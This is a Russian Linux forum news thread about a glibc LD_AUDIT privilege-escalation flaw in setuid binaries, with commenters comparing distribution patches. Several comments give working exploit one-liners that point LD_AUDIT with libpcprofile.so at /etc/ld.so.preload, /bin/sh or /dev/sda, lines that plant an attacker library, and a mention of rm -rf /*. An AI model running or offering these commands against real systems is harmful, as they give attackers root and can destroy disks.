LINUX.ORG.RU

Новый метод взлома, основанный на glibc

 , ,


0

1

Найден очередной метод взлома, основанный на glibc. Подвержены большинство Linux-систем, на которых установлена glibc версии 2.4 и выше. Проверено, что дистрибутивы OpenWall и Alt Linux не подвержены атаке, потому что у них установлен патч sanitize-env.

Смысл уязвимости — неправильные проверки при динамическом связывании в режиме LD_AUDIT библиотек с исполняемыми файлами, для которых установлены suid/sgid.
По идее, система должна блокировать LD_PRELOAD для загрузки из нестандартных областей файловой системы (/lib, /usr/lib), но не в этом случае.

Новость на opennet.ru


Обсуждение в Talks

>>> Подробности

★★★★☆

Проверено: anonymous_incognito ()
Последнее исправление: MuZHiK-2 (всего исправлений: 5)

Ответ на: комментарий от Sylvia

Кто будет? Скрипт? У него ума нет, ему что сказали, то он и пишет. Вон, в теме большинство вообще не понимают, к чему эта уязвимость, думают, что это уязвимость для крона.

debian6
()
Ответ на: комментарий от Sylvia

Ещё пара таких, и можно будет организовывать конкурсы красоты и креативности. За лучшие баги будут биться все прогрессивные репозитории.

И самое главное, когда программы становятся всё более и более зависимыми от дистрибутивов, баги прогрессируют во всё более и более совместимые с массой дистрибутивов. Вот где учиться надо.

debian6
()

>Пишем в /etc/profile.d/whatever что угодно, хотя бы rm -rf /*

LD_AUDIT=«libpcprofile.so» PCPROFILE_OUTPUT=«/bin/sh» ping

LD_AUDIT=«libpcprofile.so» PCPROFILE_OUTPUT=«/lib/ld-linux.so.2» su


umask 0 ; LD_AUDIT=«libpcprofile.so» PCPROFILE_OUTPUT=«/dev/sda» ping



Как легко видеть, здесь и сейчас верхняя планка профессионализма местных вонаби-хэккеров-скудиозиусов едва ли дотягивает до уровня мелких школьных пакостей. К счастью, при таком положении вещей, можно не беспокоится за приватность конфиденциальных данных.

anonymous
()

Все «вирусы» под Linux относятся к категории «сам скачал, сам пропатчил ось, сам скомпилировал, сам проверил, сам запустил, сам себе злобный дятел»(c)

kraftello ★★★★★
()
Ответ на: комментарий от Sylvia

Я уже с этим обновлением пробовал. Эксплоит работает.

http://mirror.yandex.ru/slackware/slackware64-13.1/patches/source/glibc/ glibc.SlackBuild   2010-Oct-20 05:45:53 - обновление этого - http://www.opennet.ru/opennews/art.shtml?num=28338

http://www.opennet.ru/opennews/art.shtml?num=28390 - это не закрыто.

triknot
()
Ответ на: комментарий от triknot

первая дыра на слаке не работала, подтвердили только на RHEL,Fedora,CentOS и Mandriva

вторая дыра работала везде,
впрочем, сравните сами патч Патрика
http://paste.org.ru/?8ghrlb
с патчем команды Дебиан
http://paste.org.ru/?6e4ydq

Sylvia ★★★★★
()
Ответ на: комментарий от Sylvia

>вторая дыра работала везде

кроме openwall и alt (fix справедливости ради...)

Sylvia ★★★★★
()
Ответ на: комментарий от anonymous

да, да и RedHat,
тем не менее патчсет для пакета eglibc Debian Squeeze от команды Debian )

Sylvia ★★★★★
()
Ответ на: комментарий от triknot

тем что от Патрика? значит что-то он недоделал

патч eglibc 2.11.2-6-squeeze1 дыру закрывает, хотя по CVE и по виду самого патча делают они одно и то же, только в дебиане еще rtld.c патчат

Sylvia ★★★★★
()
Ответ на: комментарий от male66

> Что то зачастили ошибки однако...

Может, всё же это их _обнаружение_ зачастило?..

hobbit ★★★★★
()
Ответ на: комментарий от anonymous

Лениво

Очень лениво заниматься взломом, ну просто не интересно - концепция продемонстрирована и результат известен заранее. Ну можно

umask 0 ; LD_AUDIT=«libpcprofile.so» PCPROFILE_OUTPUT=«/etc/ld.so.preload» ping

echo «/path/to/my/evil/libc.so» >/etc/ld.so.preload

или

umask 0 ; LD_AUDIT=«libpcprofile.so» PCPROFILE_OUTPUT=«/etc/ld.so.conf.d/exploit.conf» ping

echo «/path/to/my/evil/libc.so» >/etc/ld.so.conf.d/exploit.conf

Ну и что? Не интересно ни разу.

no-such-file ★★★★★
()

Знатная дыра! Кто знает, какую либу можно использовать, в случае отсутствия libpcprofile ?

liblftp-tasks из руководства слабоват. Хотелось бы файл, а не директорию.

ierton ★★
()
Ответ на: комментарий от one_quaker

Как это не работает ? Конечно работает, проверено, и x86, и x86_64 - замечательно работает.
А фиксить скорее всего не будут, не даром же говорят: «работает - не трогай».

spirit ★★★★★
()
Ответ на: комментарий от one_quaker

им скорее всего просто все равно... надо багу бы отписать в багзиллу
с высоким приоритетом, раз до сих пор не отписана (в самом деле удивительно) - значит никому не надо

Sylvia ★★★★★
()
Ответ на: комментарий от one_quaker

http://bugs.gentoo.org/show_bug.cgi?id=341755

цитирую Майка Фрайсингера (vapier@gentoo.org):

there are no packages in Gentoo that are affected by that code path now.


in all practicality, i dont think there are set*id bins installed in Gentoo

which would allow this due to our default usage of FEATURES=sfperms

glibc-2.11.2-r2 and glibc-2.12.1-r2 in the tree with the LD_AUDIT fix



долго упорствовали по поводу того что дыра может быть использована,
вроде обновились ?

Sylvia ★★★★★
()
Ответ на: комментарий от Zaqwr

>gentoo x64 файл создаётся и редактируется но (*system*) BAD FILE MODE (/etc/cron.d/exploit)

надо +x

Да прочитай ты наконец тред. Не надо.

создаётся и редактируется

Это и есть дыра.

x3al ★★★★★
()
Ответ на: комментарий от x3al

дыра есть, но рута не получить так как тут описано, хотя к примеру если кто-то используют апач itk , можно в /etc/apache2/modules.d/exploit.conf создать свой виртхост с AssignUserID root root

Zaqwr
()

В Gentoo пропатчили только после выпуска патча апстримом, патч для проактивной защиты отклонили без комментариев.

У меня тоже без комментариев.

anonymous
()
Ответ на: комментарий от anonymous

харденед такой харденед...

Тоже самое было и с добавлением gradm патча к iptables. Но там решилось обходным путем, через xtables-addons. А вот в случае с glibc как то совсем грустно...

anonymous
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.